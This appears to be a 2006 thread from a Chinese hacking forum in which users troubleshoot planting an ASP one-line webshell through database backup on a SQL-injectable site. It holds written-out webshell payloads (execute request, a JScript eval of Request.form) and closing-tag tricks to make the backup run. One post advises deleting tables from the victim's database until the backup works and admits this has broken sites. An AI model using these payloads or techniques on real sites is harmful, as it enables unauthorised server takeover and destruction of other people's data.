打印

[讨论]刺手的备份

xindong

晶莹剔透§烈日灼然

Rank: 1

帖子: 25
精华: 0
积分: 84
阅读权限: 40
在线时间: 9 小时
注册时间: 2005-8-8
最后登录: 2006-10-3

发短消息
加为好友
当前离线

楼主大中小发表于 2006-4-22 14:25 只看该作者

[讨论]刺手的备份

议题作者：灰色轨迹
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

议题内容：
好久的一个注入点了，DB_OWNER权限，在备份时我花了N种备份方法，比如备份<%execute request("guiji")%>和<%%25execute request("guiji")%%25>等，都出现无效字符，今天又用小路写的工具备份如下代码：%><%<%execute(request("guiji"))%25%>结果如下：

Microsoft VBScript 编译器错误错误 '800a0400'

缺少语句

/aaa.asp，行 7011

<%execute(request("guiji"))%25
^

还不知哪儿出错了，我再备份如下代码：%><%<%execute(request("guiji"))% >%>
（我将上面的25换成了空格）

Microsoft VBScript 编译器错误错误 '800a0400'

缺少语句

/aaa.asp，行 7034

<%execute(request("guiji"))% >
^

感觉要成功了，可是就是不成功，不知道怎么办了，大家议议这是怎么回事，如何解决?

TOP

zero_cold

晶莹剔透§烈日灼然

Rank: 1

帖子: 38
精华: 2
积分: 194
阅读权限: 40
性别: 男
在线时间: 52 小时
注册时间: 2005-10-14
最后登录: 2007-7-15

发短消息
加为好友
当前离线

沙发大中小发表于 2006-4-23 09:37 只看该作者

闭合的问题，向这样<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>%>就可以了

TOP

xindong

晶莹剔透§烈日灼然

Rank: 1

帖子: 25
精华: 0
积分: 84
阅读权限: 40
在线时间: 9 小时
注册时间: 2005-8-8
最后登录: 2006-10-3

发短消息
加为好友
当前离线

椅子大中小发表于 2006-4-23 12:23 只看该作者

这样的代码我早试过了，都不行啊，不知有没有通过修改一下我上面的代码来将它闭合

TOP

蜀山剑客

晶莹剔透§烈日灼然

Rank: 1

帖子: 59
精华: 2
积分: 219
阅读权限: 40
性别: 男
来自: 蜀
在线时间: 152 小时
注册时间: 2005-2-6
最后登录: 2008-11-25

发短消息
加为好友
当前离线

板凳大中小发表于 2006-4-23 15:59 只看该作者

碰到上面的情况，我一般用两种方法突破！一种就是LOG备份，另一种有点危险性（不要模仿 [s:58] ）,就是在数据库里删掉一些可疑的表，删一个备份一次。呵呵。成功过不少的！也有毁掉过不少的！ [s:58]

My Blog http://www.ssjk.org

TOP

xhming

晶莹剔透§烈日灼然

Rank: 1

帖子: 31
精华: 0
积分: 119
阅读权限: 40
性别: 男
在线时间: 114 小时
注册时间: 2005-6-5
最后登录: 2007-10-9

发短消息
加为好友
当前离线

地板大中小发表于 2006-4-23 17:24 只看该作者

刚碰到个Microsoft VBScript 编译器错误错误 '800a0408'

无效字符

/sys2/x.asp，行118

l]?
-^

TOP

donker

晶莹剔透§烈日灼然

Rank: 1

帖子: 45
精华: 0
积分: 154
阅读权限: 40
性别: 男
在线时间: 115 小时
注册时间: 2006-4-13
最后登录: 2009-1-6

发短消息
加为好友
当前离线

6楼大中小发表于 2006-4-23 18:36 只看该作者

引用:

这里是引用第[3 楼]的蜀山剑客于2006-04-23 15:59发表的：
碰到上面的情况，我一般用两种方法突破！一种就是LOG备份，另一种有点危险性（不要模仿 [s:58] ）,就是在数据库里删掉一些可疑的表，删一个备份一次。呵呵。成功过不少的！也有毁掉过不少的！ [s:58]

我晕哦~~~~~ [s:92] LOG备份确实大大提高的成功率但你所说的删表再备份可不是个太好的办法啊~~
首先对管理员来说~~~人家建个站也不容易万一人家没有备份或着本机调试的数据库也不完整....体谅一下人家哦 [s:89] 况且你目的无非是解决网站系统对代码的过滤吧~~~那请你实在没别的办法的时候也最好是看看那站是不是些开源的管理程序如果是你下个对照下确定那些表可能是二次开发的时候管理员加进去的再考虑去删除表达到效果吧 [s:74]

www.tsnews.net唐山在线 www.qq-qqzone.cnQQ空间

TOP

NetKnave

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 115
精华: 2
积分: 3249
阅读权限: 100
性别: 男
在线时间: 135 小时
注册时间: 2004-10-12
最后登录: 2009-1-8

发短消息
加为好友
当前离线

7楼大中小发表于 2006-4-23 23:31 只看该作者

今天正好也碰到个这个问题
<%%25execute request("a")%%25>
未闭合.
然后再次备份..直接 %>
成功

我的世界不允许你消失。。不论结局是否完美。。 http://www.netpk.org

TOP

蜀山剑客

晶莹剔透§烈日灼然

Rank: 1

帖子: 59
精华: 2
积分: 219
阅读权限: 40
性别: 男
来自: 蜀
在线时间: 152 小时
注册时间: 2005-2-6
最后登录: 2008-11-25

发短消息
加为好友
当前离线

8楼大中小发表于 2006-4-24 09:57 只看该作者

引用:

这里是引用第[5 楼]的donker于2006-04-23 18:36发表的：

我晕哦~~~~~ [s:92] LOG备份确实大大提高的成功率但你所说的删表再备份可不是个太好的办法啊~~
首先对管理员来说~~~人家建个站也不容易万一人家没有备份或着本机调试的数据库也不完整....体谅一下人家哦 [s:89] 况且你目的无非是解决网站系统对代码的过滤吧~~~那请你实在没别的办法的时候也最好是看看那站是不是些开源的管理程序如果是你下个对照下确定那些表可能是二次开发的时候管理员加进去的再考虑去删除表达到效果吧 [s:74]

呵呵，我都说了危险性大，不要模仿了。不管怎么说。这是一个解决方法。但是不能乱用。特别是对数据库结构不了解的情况下。很可能一不小心。毁了数据库。网站就瘫痪了。只是说出来交流一下。没有说去删人家数据库。

My Blog http://www.ssjk.org

TOP

xindong

晶莹剔透§烈日灼然

Rank: 1

帖子: 25
精华: 0
积分: 84
阅读权限: 40
在线时间: 9 小时
注册时间: 2005-8-8
最后登录: 2006-10-3

发短消息
加为好友
当前离线

9楼大中小发表于 2006-4-25 10:37 只看该作者

引用:

这里是引用第[7 楼]的蜀山剑客于2006-04-24 09:57发表的：

呵呵，我都说了危险性大，不要模仿了。不管怎么说。这是一个解决方法。但是不能乱用。特别是对数据库结构不了解的情况下。很可能一不小心。毁了数据库。网站就瘫痪了。只是说出来交流一下。没有说去删人家数据库。

这种方法也试过了，不行啊

TOP

蜀山剑客

晶莹剔透§烈日灼然

Rank: 1

帖子: 59
精华: 2
积分: 219
阅读权限: 40
性别: 男
来自: 蜀
在线时间: 152 小时
注册时间: 2005-2-6
最后登录: 2008-11-25

发短消息
加为好友
当前离线

10楼 大中小发表于 2006-4-26 11:48 只看该作者

引用:

这里是引用第[8 楼]的xindong于2006-04-25 10:37发表的：

这种方法也试过了，不行啊

那是因为你没有删对表！

My Blog http://www.ssjk.org

TOP

hack520

运维管理组

Rank: 7 Rank: 7 Rank: 7 Rank: 7

E.S.T论坛版主

帖子: 1082
精华: 6
积分: 5594
阅读权限: 150
性别: 男
在线时间: 579 小时
注册时间: 2005-3-18
最后登录: 2008-8-31

发短消息
加为好友
当前离线

11楼 大中小发表于 2006-4-28 08:33 只看该作者

[s:75] 你在前面加个%>就OK 了 [s:75]

Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
注：此账号密码已更改，请本人与冰血联系修改密码。

TOP

xindong

晶莹剔透§烈日灼然

Rank: 1

帖子: 25
精华: 0
积分: 84
阅读权限: 40
在线时间: 9 小时
注册时间: 2005-8-8
最后登录: 2006-10-3

发短消息
加为好友
当前离线

12楼 大中小发表于 2006-5-3 23:08 只看该作者

引用:

这里是引用第[6 楼]的NetKnave于2006-04-23 23:31发表的：
今天正好也碰到个这个问题
<%%25execute request("a")%%25>
未闭合.
然后再次备份..直接 %>
成功

无论我怎么备份，总是在缺少%>和无效字符两者之间变换

TOP